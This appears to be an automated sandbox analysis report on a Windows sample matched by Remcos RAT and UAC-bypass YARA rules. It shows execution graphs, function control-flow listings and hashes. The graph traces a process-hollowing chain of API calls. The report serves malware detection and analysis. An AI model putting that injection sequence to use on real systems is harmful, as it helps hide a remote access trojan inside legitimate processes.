                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                        Has exited:true

                                                                                        Disassembly

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:10.7%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:174
                                                                                          Total number of Limit Nodes:15
                                                                                          execution_graph 38308 c1ac90 38312 c1ad79 38308->38312 38317 c1ad88 38308->38317 38309 c1ac9f 38313 c1adbc 38312->38313 38314 c1ad99 38312->38314 38313->38309 38314->38313 38315 c1afc0 GetModuleHandleW 38314->38315 38316 c1afed 38315->38316 38316->38309 38318 c1adbc 38317->38318 38319 c1ad99 38317->38319 38318->38309 38319->38318 38320 c1afc0 GetModuleHandleW 38319->38320 38321 c1afed 38320->38321 38321->38309 38332 c1d660 DuplicateHandle 38333 c1d6f6 38332->38333 38322 c1d418 38323 c1d45e GetCurrentProcess 38322->38323 38325 c1d4b0 GetCurrentThread 38323->38325 38326 c1d4a9 38323->38326 38327 c1d4e6 38325->38327 38328 c1d4ed GetCurrentProcess 38325->38328 38326->38325 38327->38328 38329 c1d523 38328->38329 38330 c1d54b GetCurrentThreadId 38329->38330 38331 c1d57c 38330->38331 38334 c14668 38335 c1467a 38334->38335 38336 c14686 38335->38336 38338 c14778 38335->38338 38339 c1479d 38338->38339 38343 c14879 38339->38343 38347 c14888 38339->38347 38345 c14888 38343->38345 38344 c1498c 38344->38344 38345->38344 38351 c144b4 38345->38351 38348 c148af 38347->38348 38349 c144b4 CreateActCtxA 38348->38349 38350 c1498c 38348->38350 38349->38350 38352 c15918 CreateActCtxA 38351->38352 38354 c159db 38352->38354 38129 754c31e 38130 754c290 38129->38130 38131 754c2d4 38129->38131 38134 754eb50 38131->38134 38152 754eb41 38131->38152 38135 754eb6a 38134->38135 38136 754eb72 38135->38136 38171 754f1fb 38135->38171 38176 754f17a 38135->38176 38181 754f098 38135->38181 38185 754ef78 38135->38185 38190 754f598 38135->38190 38194 754f6f8 38135->38194 38199 754f23d 38135->38199 38203 754f654 38135->38203 38211 754f328 38135->38211 38216 754f280 38135->38216 38221 754f4a7 38135->38221 38225 754f567 38135->38225 38231 754f146 38135->38231 38235 754f485 38135->38235 38240 754f604 38135->38240 38136->38130 38153 754eb9d 38152->38153 38154 754eb4a 38152->38154 38153->38130 38155 754eb72 38154->38155 38156 754f654 4 API calls 38154->38156 38157 754f23d 2 API calls 38154->38157 38158 754f6f8 2 API calls 38154->38158 38159 754f598 2 API calls 38154->38159 38160 754ef78 2 API calls 38154->38160 38161 754f098 2 API calls 38154->38161 38162 754f17a 2 API calls 38154->38162 38163 754f1fb 2 API calls 38154->38163 38164 754f604 4 API calls 38154->38164 38165 754f485 2 API calls 38154->38165 38166 754f146 2 API calls 38154->38166 38167 754f567 2 API calls 38154->38167 38168 754f4a7 2 API calls 38154->38168 38169 754f280 2 API calls 38154->38169 38170 754f328 2 API calls 38154->38170 38155->38130 38156->38155 38157->38155 38158->38155 38159->38155 38160->38155 38161->38155 38162->38155 38163->38155 38164->38155 38165->38155 38166->38155 38167->38155 38168->38155 38169->38155 38170->38155 38172 754f201 38171->38172 38173 754f995 38172->38173 38248 754b3e0 38172->38248 38252 754b3e8 38172->38252 38173->38136 38177 754f180 38176->38177 38179 754b3e0 ResumeThread 38177->38179 38180 754b3e8 ResumeThread 38177->38180 38178 754f995 38178->38136 38179->38178 38180->38178 38182 754f0cc 38181->38182 38256 754bce4 38181->38256 38260 754bcf0 38181->38260 38186 754efa0 38185->38186 38188 754bce4 CreateProcessA 38186->38188 38189 754bcf0 CreateProcessA 38186->38189 38187 754f0cc 38188->38187 38189->38187 38264 754ba60 38190->38264 38268 754ba68 38190->38268 38191 754f0fe 38195 754f6fe 38194->38195 38195->38136 38196 754f956 38195->38196 38272 754bb50 38195->38272 38276 754bb58 38195->38276 38196->38136 38201 754ba60 WriteProcessMemory 38199->38201 38202 754ba68 WriteProcessMemory 38199->38202 38200 754f261 38200->38136 38201->38200 38202->38200 38204 754f60c 38203->38204 38280 754b8c8 38204->38280 38284 754b8d0 38204->38284 38205 754f191 38206 754f969 38205->38206 38209 754b3e0 ResumeThread 38205->38209 38210 754b3e8 ResumeThread 38205->38210 38206->38136 38209->38206 38210->38206 38212 754f22c 38211->38212 38213 754f498 38212->38213 38214 754ba60 WriteProcessMemory 38212->38214 38215 754ba68 WriteProcessMemory 38212->38215 38214->38212 38215->38212 38217 754f28d 38216->38217 38217->38136 38218 754f956 38217->38218 38219 754bb50 ReadProcessMemory 38217->38219 38220 754bb58 ReadProcessMemory 38217->38220 38218->38136 38219->38217 38220->38217 38223 754b8d0 Wow64SetThreadContext 38221->38223 38224 754b8c8 Wow64SetThreadContext 38221->38224 38222 754f4c1 38223->38222 38224->38222 38226 754f574 38225->38226 38227 754f22c 38225->38227 38228 754f498 38227->38228 38229 754ba60 WriteProcessMemory 38227->38229 38230 754ba68 WriteProcessMemory 38227->38230 38229->38227 38230->38227 38288 754fbd0 38231->38288 38293 754fbe0 38231->38293 38232 754f165 38236 754f492 38235->38236 38236->38136 38237 754f956 38236->38237 38238 754bb50 ReadProcessMemory 38236->38238 38239 754bb58 ReadProcessMemory 38236->38239 38237->38136 38238->38236 38239->38236 38241 754f60c 38240->38241 38244 754b8d0 Wow64SetThreadContext 38241->38244 38245 754b8c8 Wow64SetThreadContext 38241->38245 38242 754f191 38243 754f969 38242->38243 38246 754b3e0 ResumeThread 38242->38246 38247 754b3e8 ResumeThread 38242->38247 38243->38136 38244->38242 38245->38242 38246->38243 38247->38243 38249 754b3e8 ResumeThread 38248->38249 38251 754b459 38249->38251 38251->38173 38253 754b428 ResumeThread 38252->38253 38255 754b459 38253->38255 38255->38173 38257 754bd79 CreateProcessA 38256->38257 38259 754bf3b 38257->38259 38261 754bd79 CreateProcessA 38260->38261 38263 754bf3b 38261->38263 38265 754ba68 WriteProcessMemory 38264->38265 38267 754bb07 38265->38267 38267->38191 38269 754bab0 WriteProcessMemory 38268->38269 38271 754bb07 38269->38271 38271->38191 38273 754bb57 ReadProcessMemory 38272->38273 38275 754bbe7 38273->38275 38275->38195 38277 754bba3 ReadProcessMemory 38276->38277 38279 754bbe7 38277->38279 38279->38195 38281 754b8d0 Wow64SetThreadContext 38280->38281 38283 754b95d 38281->38283 38283->38205 38285 754b915 Wow64SetThreadContext 38284->38285 38287 754b95d 38285->38287 38287->38205 38289 754fbe0 38288->38289 38298 754b9a0 38289->38298 38302 754b9a8 38289->38302 38290 754fc14 38290->38232 38294 754fbf5 38293->38294 38296 754b9a0 VirtualAllocEx 38294->38296 38297 754b9a8 VirtualAllocEx 38294->38297 38295 754fc14 38295->38232 38296->38295 38297->38295 38299 754b9a8 VirtualAllocEx 38298->38299 38301 754ba25 38299->38301 38301->38290 38303 754b9e8 VirtualAllocEx 38302->38303 38305 754ba25 38303->38305 38305->38290 38306 ad600d8 PostMessageW 38307 ad60144 38306->38307

                                                                                          Executed Functions

                                                                                          Function 02D3C980 Relevance: 8.5, Strings: 6, Instructions: 1022COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 402 2d3c980-2d3c9a1 403 2d3c9a3 402->403 404 2d3c9a8-2d3ca94 402->404 403->404 406 2d3ca9a-2d3cbeb 404->406 407 2d3d2bc-2d3d2e4 404->407 451 2d3cbf1-2d3cc4c 406->451 452 2d3d28a-2d3d2b9 406->452 410 2d3d9c1-2d3d9ca 407->410 411 2d3d2f2-2d3d2fb 410->411 412 2d3d9d0-2d3d9e7 410->412 414 2d3d302-2d3d3e3 411->414 415 2d3d2fd 411->415 432 2d3d3e9-2d3d3f6 414->432 415->414 433 2d3d420 432->433 434 2d3d3f8-2d3d404 432->434 436 2d3d426-2d3d446 433->436 437 2d3d406-2d3d40c 434->437 438 2d3d40e-2d3d414 434->438 443 2d3d4a6-2d3d51c 436->443 444 2d3d448-2d3d4a1 436->444 440 2d3d41e 437->440 438->440 440->436 462 2d3d571-2d3d5b4 call 2d3c930 443->462 463 2d3d51e-2d3d56f 443->463 457 2d3d9be 444->457 460 2d3cc51-2d3cc5c 451->460 461 2d3cc4e 451->461 452->407 457->410 464 2d3d1a0-2d3d1a6 460->464 461->460 489 2d3d5bf-2d3d5c5 462->489 463->489 466 2d3cc61-2d3cc7f 464->466 467 2d3d1ac-2d3d229 464->467 469 2d3cc81-2d3cc85 466->469 470 2d3ccd6-2d3cceb 466->470 507 2d3d276-2d3d27c 467->507 469->470 475 2d3cc87-2d3cc92 469->475 472 2d3ccf2-2d3cd08 470->472 473 2d3cced 470->473 480 2d3cd0a 472->480 481 2d3cd0f-2d3cd26 472->481 473->472 477 2d3ccc8-2d3ccce 475->477 482 2d3ccd0-2d3ccd1 477->482 483 2d3cc94-2d3cc98 477->483 480->481 484 2d3cd28 481->484 485 2d3cd2d-2d3cd43 481->485 492 2d3cd54-2d3cdc5 482->492 487 2d3cc9a 483->487 488 2d3cc9e-2d3ccb6 483->488 484->485 490 2d3cd45 485->490 491 2d3cd4a-2d3cd51 485->491 487->488 495 2d3ccb8 488->495 496 2d3ccbd-2d3ccc5 488->496 497 2d3d61c-2d3d628 489->497 490->491 491->492 498 2d3cdc7 492->498 499 2d3cddb-2d3cf53 492->499 495->496 496->477 501 2d3d5c7-2d3d5e9 497->501 502 2d3d62a-2d3d6b2 497->502 498->499 500 2d3cdc9-2d3cdd5 498->500 508 2d3cf55 499->508 509 2d3cf69-2d3d0a4 499->509 500->499 504 2d3d5f0-2d3d619 501->504 505 2d3d5eb 501->505 531 2d3d833-2d3d83c 502->531 504->497 505->504 512 2d3d22b-2d3d273 507->512 513 2d3d27e 507->513 508->509 514 2d3cf57-2d3cf63 508->514 521 2d3d0a6-2d3d0aa 509->521 522 2d3d108-2d3d11d 509->522 512->507 513->452 514->509 521->522 524 2d3d0ac-2d3d0bb 521->524 526 2d3d124-2d3d145 522->526 527 2d3d11f 522->527 530 2d3d0fa-2d3d100 524->530 528 2d3d147 526->528 529 2d3d14c-2d3d16b 526->529 527->526 528->529 535 2d3d172-2d3d192 529->535 536 2d3d16d 529->536 537 2d3d102-2d3d103 530->537 538 2d3d0bd-2d3d0c1 530->538 533 2d3d842-2d3d89d 531->533 534 2d3d6b7-2d3d6cc 531->534 560 2d3d8d4-2d3d8fe 533->560 561 2d3d89f-2d3d8d2 533->561 541 2d3d6d5-2d3d821 534->541 542 2d3d6ce 534->542 543 2d3d194 535->543 544 2d3d199 535->544 536->535 545 2d3d19d 537->545 539 2d3d0c3-2d3d0c7 538->539 540 2d3d0cb-2d3d0ec 538->540 539->540 547 2d3d0f3-2d3d0f7 540->547 548 2d3d0ee 540->548 562 2d3d82d 541->562 542->541 549 2d3d763-2d3d7a3 542->549 550 2d3d6db-2d3d719 542->550 551 2d3d7a8-2d3d7e8 542->551 552 2d3d71e-2d3d75e 542->552 543->544 544->545 545->464 547->530 548->547 549->562 550->562 551->562 552->562 569 2d3d907-2d3d9b7 560->569 561->569 562->531 569->457
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1830060014.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$<ov!$TJkq$Tefq$pjq$xbiq
                                                                                          • API String ID: 0-4095964437
                                                                                          • Opcode ID: 80b41769fde6981e84b9847a060fdcfad1a076adad8d44ef20d958948000400f
                                                                                          • Instruction ID: 5b0d97363bc41f334e52d55d544e5f49989a76d72b33588362e3e92d3d773907
                                                                                          • Opcode Fuzzy Hash: 80b41769fde6981e84b9847a060fdcfad1a076adad8d44ef20d958948000400f
                                                                                          • Instruction Fuzzy Hash: 75B2C375E00228DFCB65CF69C984AD9BBB2BF89304F1581E9D509AB365DB319E81CF40
                                                                                          Function 02D3A1EE Relevance: 1.8, Strings: 1, Instructions: 561COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 700 2d3a1ee-2d3a1f2 701 2d3a1f3-2d3a208 700->701 702 2d3abb5-2d3abc2 700->702 701->702 703 2d3a209-2d3a214 701->703 705 2d3a21a-2d3a226 703->705 706 2d3a232-2d3a241 705->706 708 2d3a2a0-2d3a2a4 706->708 709 2d3a2aa-2d3a2b3 708->709 710 2d3a34c-2d3a3b6 708->710 711 2d3a2b9-2d3a2cf 709->711 712 2d3a1ae-2d3a1ba 709->712 710->702 747 2d3a3bc-2d3a903 710->747 718 2d3a321-2d3a333 711->718 719 2d3a2d1-2d3a2d4 711->719 712->702 714 2d3a1c0-2d3a1cc 712->714 716 2d3a243-2d3a249 714->716 717 2d3a1ce-2d3a1e2 714->717 716->702 720 2d3a24f-2d3a267 716->720 717->716 727 2d3a1e4-2d3a1ed 717->727 728 2d3aaf4-2d3abaa 718->728 729 2d3a339-2d3a349 718->729 719->702 722 2d3a2da-2d3a317 719->722 720->702 731 2d3a26d-2d3a295 720->731 722->710 743 2d3a319-2d3a31f 722->743 727->700 728->702 731->708 743->718 743->719 825 2d3a905-2d3a90f 747->825 826 2d3a91a-2d3a9ad 747->826 827 2d3a915 825->827 828 2d3a9b8-2d3aa4b 825->828 826->828 829 2d3aa56-2d3aae9 827->829 828->829 829->728
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1830060014.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: D
                                                                                          • API String ID: 0-2746444292
                                                                                          • Opcode ID: 67ec23b67089ec6fda5a71332d5f0ac6cc019fe15c015038d1c461dfbc276caf
                                                                                          • Instruction ID: 0c7181db204eccca50f970ed4922d7c199e17be5af31f2e3f4ad185db2629d1d
                                                                                          • Opcode Fuzzy Hash: 67ec23b67089ec6fda5a71332d5f0ac6cc019fe15c015038d1c461dfbc276caf
                                                                                          • Instruction Fuzzy Hash: 8152B974A002298FCB65DF68C998A9EB7B2FF89300F1045D9D549A7365CF31AE81CF51
                                                                                          Function 0AD60E35 Relevance: .4, Instructions: 406COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1838316165.000000000AD60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AD60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ad60000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fe58d1468fd6989adc4c321c0ec1adc80d46a29fb69e38ef4374cd6d19e32301
                                                                                          • Instruction ID: b78702a4aeeea4dc68901346b2aa55951f957ffca5d5d4e5f07113ae81223f37
                                                                                          • Opcode Fuzzy Hash: fe58d1468fd6989adc4c321c0ec1adc80d46a29fb69e38ef4374cd6d19e32301
                                                                                          • Instruction Fuzzy Hash: 5CE1DD70B012048FDB29DF75C450BAEB7FAAF8A300F16846DE146DB291CB35E941DB91
                                                                                          Function 07546139 Relevance: .1, Instructions: 71COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1835554137.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7540000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bce9662ee7bd3ce9b4cfd1dcf7570cb0aba3696f7cf7f9eb36c40fd1b9281e9b
                                                                                          • Instruction ID: f9cf93ccc295665e20f674468c7cb1ffa1916654ae355a5bc90bc691d07aa0c2
                                                                                          • Opcode Fuzzy Hash: bce9662ee7bd3ce9b4cfd1dcf7570cb0aba3696f7cf7f9eb36c40fd1b9281e9b
                                                                                          • Instruction Fuzzy Hash: 3A2127B1D156188BEB08CFA7D8453EEBFB6FFCA304F04C06AD40966255DB7009468BA0
                                                                                          Function 07546148 Relevance: .1, Instructions: 66COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1835554137.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7540000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6b6a9f4e36ddb344ad082da20738e0cfa0ffe71f3cad264247dc642c5c46516a
                                                                                          • Instruction ID: 7a6eb91b4d6cedefe69e3770564bfc700ce6c05fc81ae88a00d942557960b989
                                                                                          • Opcode Fuzzy Hash: 6b6a9f4e36ddb344ad082da20738e0cfa0ffe71f3cad264247dc642c5c46516a
                                                                                          • Instruction Fuzzy Hash: 0321E4B0D156189BEB18CF97D8447EEFABAFFCA304F14C02A940966264DB7509498BA0
                                                                                          Function 0754F3B6 Relevance: .0, Instructions: 20COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1835554137.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7540000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6017f6232e2eb168882c51d9e3fd057b023d026d01f6af0d6d9251c92a1e5a1e
                                                                                          • Instruction ID: a26cd1d71cf8c2b9d2b1980f74f93c58f9d6574def36e3ce7258d487b0bd243f
                                                                                          • Opcode Fuzzy Hash: 6017f6232e2eb168882c51d9e3fd057b023d026d01f6af0d6d9251c92a1e5a1e
                                                                                          • Instruction Fuzzy Hash: BFE08CF4D1E288CFC7429B7464905F1BFF8BF0B204F0828E9C08967692D6648900CB26
                                                                                          Function 02D30870 Relevance: 9.1, Strings: 7, Instructions: 372COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 294 2d30870-2d308b6 298 2d309df-2d309fc 294->298 299 2d308bc-2d308c4 294->299 308 2d30a06 298->308 309 2d309fe-2d30a04 298->309 302 2d308c6-2d308cc 299->302 303 2d308ce 299->303 305 2d308d4 302->305 303->305 400 2d308d6 call c1b010 305->400 401 2d308d6 call c1b020 305->401 307 2d308db-2d308f4 314 2d308f6 307->314 315 2d30905-2d30958 307->315 310 2d30a0c-2d30a26 308->310 309->310 319 2d30ad0-2d30adb 310->319 320 2d30a2c-2d30a39 310->320 317 2d30b22-2d30b37 314->317 318 2d308fc-2d308ff 314->318 355 2d30960-2d3097d 315->355 325 2d30b38-2d30b8d 317->325 318->315 318->317 326 2d30b19-2d30b21 319->326 327 2d30add-2d30aeb 319->327 328 2d30a84-2d30a91 320->328 329 2d30a3b-2d30a45 320->329 364 2d30b8f-2d30e29 325->364 327->326 337 2d30aed-2d30b11 327->337 328->319 336 2d30a93-2d30ab8 328->336 329->328 338 2d30a47-2d30a6c 329->338 336->319 357 2d30aba-2d30ac8 336->357 337->326 338->328 354 2d30a6e-2d30a7c 338->354 354->328 355->298 357->319 400->307 401->307
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1830060014.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq
                                                                                          • API String ID: 0-4057749079
                                                                                          • Opcode ID: 49a722af8ba9c44e557112ce5cffc744a80e9238c2a6dce4a13638faedc8959a
                                                                                          • Instruction ID: 1b1260db96b64d3fcceab7aedc4329e4ccc88044036d3a292beee411809fae35
                                                                                          • Opcode Fuzzy Hash: 49a722af8ba9c44e557112ce5cffc744a80e9238c2a6dce4a13638faedc8959a
                                                                                          • Instruction Fuzzy Hash: E0E1AF356002059FDB09EF75E990BAE7BB2EF89304F044069E506EB3A6DF359D41CB91
                                                                                          Function 02D37060 Relevance: 7.6, Strings: 6, Instructions: 75COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 574 2d37060-2d37072 576 2d3707a-2d3707e 574->576 577 2d37080-2d37084 576->577 578 2d37086-2d37088 576->578 577->578 579 2d3708a-2d37093 577->579 580 2d370f8-2d370ff 578->580 581 2d37107-2d37111 579->581 582 2d37095-2d370af 579->582 587 2d37113-2d3711e 581->587 588 2d370c6-2d370e2 581->588 585 2d370b1 582->585 586 2d370f5 582->586 589 2d370b4-2d370b9 585->589 586->580 593 2d370e4-2d370e8 588->593 594 2d370eb-2d370ee 588->594 589->581 591 2d370bb-2d370c1 589->591 591->588 593->594 595 2d37102 594->595 596 2d370f0-2d370f3 594->596 595->581 596->586 596->589
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1830060014.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (ofq$(ofq$(ofq$,jq$,jq$Hjq
                                                                                          • API String ID: 0-4260206024
                                                                                          • Opcode ID: 5b7282100881158f42f3339889f60348cb3170c9e46bab9bac88008f2f0c1f82
                                                                                          • Instruction ID: d5c2df85d6cb372e03367793fa721fd7724e15e94c0b8582d77158305b68db68
                                                                                          • Opcode Fuzzy Hash: 5b7282100881158f42f3339889f60348cb3170c9e46bab9bac88008f2f0c1f82
                                                                                          • Instruction Fuzzy Hash: C5219DB5A0460A8FDB11DFB8C4D4AAEBBB1EF49354F1540A5E905DB361DB30EC81CBA1
                                                                                          Function 00C1D408 Relevance: 6.1, APIs: 4, Instructions: 134threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 597 c1d408-c1d4a7 GetCurrentProcess 601 c1d4b0-c1d4e4 GetCurrentThread 597->601 602 c1d4a9-c1d4af 597->602 603 c1d4e6-c1d4ec 601->603 604 c1d4ed-c1d521 GetCurrentProcess 601->604 602->601 603->604 606 c1d523-c1d529 604->606 607 c1d52a-c1d545 call c1d5e9 604->607 606->607 610 c1d54b-c1d57a GetCurrentThreadId 607->610 611 c1d583-c1d5e5 610->611 612 c1d57c-c1d582 610->612 612->611
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32 ref: 00C1D496
                                                                                          • GetCurrentThread.KERNEL32 ref: 00C1D4D3
                                                                                          • GetCurrentProcess.KERNEL32 ref: 00C1D510
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00C1D569
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1828065397.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_c10000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID: Current$ProcessThread
                                                                                          • String ID:
                                                                                          • API String ID: 2063062207-0
                                                                                          • Opcode ID: 886fce025b8738d49974890e734828d1358d0b89d0092f6fa96d597f2d2fee76
                                                                                          • Instruction ID: 6482006462ff296a0d2ee9397c5211a4d20bf9123bd069272ae799c1bc66d379
                                                                                          • Opcode Fuzzy Hash: 886fce025b8738d49974890e734828d1358d0b89d0092f6fa96d597f2d2fee76
                                                                                          • Instruction Fuzzy Hash: F25159B0900309DFDB24CFAAD548BDEBBF1EF89318F248459E019A7360D7749984CB65
                                                                                          Function 00C1D418 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 619 c1d418-c1d4a7 GetCurrentProcess 623 c1d4b0-c1d4e4 GetCurrentThread 619->623 624 c1d4a9-c1d4af 619->624 625 c1d4e6-c1d4ec 623->625 626 c1d4ed-c1d521 GetCurrentProcess 623->626 624->623 625->626 628 c1d523-c1d529 626->628 629 c1d52a-c1d545 call c1d5e9 626->629 628->629 632 c1d54b-c1d57a GetCurrentThreadId 629->632 633 c1d583-c1d5e5 632->633 634 c1d57c-c1d582 632->634 634->633
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32 ref: 00C1D496
                                                                                          • GetCurrentThread.KERNEL32 ref: 00C1D4D3
                                                                                          • GetCurrentProcess.KERNEL32 ref: 00C1D510
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00C1D569
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1828065397.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_c10000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID: Current$ProcessThread
                                                                                          • String ID:
                                                                                          • API String ID: 2063062207-0
                                                                                          • Opcode ID: d236db0485576c06628560415fbdcbbd94b348f822b6da72196c0bb3b4af28ec
                                                                                          • Instruction ID: 667870085b88d1c5c4c11f7f4813bc3842e0aeee0273c4ec7b1ad6283fd71436
                                                                                          • Opcode Fuzzy Hash: d236db0485576c06628560415fbdcbbd94b348f822b6da72196c0bb3b4af28ec
                                                                                          • Instruction Fuzzy Hash: 065146B0900309DFDB24CFAAD548BDEBBF1EF89318F248459E419A7360D774A984CB65
                                                                                          Function 0754BCE4 Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 854 754bce4-754bd85 856 754bd87-754bd91 854->856 857 754bdbe-754bdde 854->857 856->857 858 754bd93-754bd95 856->858 862 754be17-754be46 857->862 863 754bde0-754bdea 857->863 860 754bd97-754bda1 858->860 861 754bdb8-754bdbb 858->861 864 754bda5-754bdb4 860->864 865 754bda3 860->865 861->857 873 754be7f-754bf39 CreateProcessA 862->873 874 754be48-754be52 862->874 863->862 866 754bdec-754bdee 863->866 864->864 867 754bdb6 864->867 865->864 868 754bdf0-754bdfa 866->868 869 754be11-754be14 866->869 867->861 871 754bdfc 868->871 872 754bdfe-754be0d 868->872 869->862 871->872 872->872 875 754be0f 872->875 885 754bf42-754bfc8 873->885 886 754bf3b-754bf41 873->886 874->873 876 754be54-754be56 874->876 875->869 878 754be58-754be62 876->878 879 754be79-754be7c 876->879 880 754be64 878->880 881 754be66-754be75 878->881 879->873 880->881 881->881 882 754be77 881->882 882->879 896 754bfd8-754bfdc 885->896 897 754bfca-754bfce 885->897 886->885 898 754bfec-754bff0 896->898 899 754bfde-754bfe2 896->899 897->896 900 754bfd0 897->900 902 754c000-754c004 898->902 903 754bff2-754bff6 898->903 899->898 901 754bfe4 899->901 900->896 901->898 905 754c016-754c01d 902->905 906 754c006-754c00c 902->906 903->902 904 754bff8 903->904 904->902 907 754c034 905->907 908 754c01f-754c02e 905->908 906->905 909 754c035 907->909 908->907 909->909
                                                                                          APIs
                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0754BF26
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1835554137.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7540000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateProcess
                                                                                          • String ID:
                                                                                          • API String ID: 963392458-0
                                                                                          • Opcode ID: 68525a0d4efb9f9d21fc23ac107c3d378999d9b93b49964909131ca5c98e4d6f
                                                                                          • Instruction ID: 2fd4bee75371c791a94640fe3c2b08893dad5d39d8efbe7290befde2949d8be8
                                                                                          • Opcode Fuzzy Hash: 68525a0d4efb9f9d21fc23ac107c3d378999d9b93b49964909131ca5c98e4d6f
                                                                                          • Instruction Fuzzy Hash: 52A13BB1D04219DFDF24DF68C8417DDBAB2FF48318F1485AAE808A7290DB759985CF91
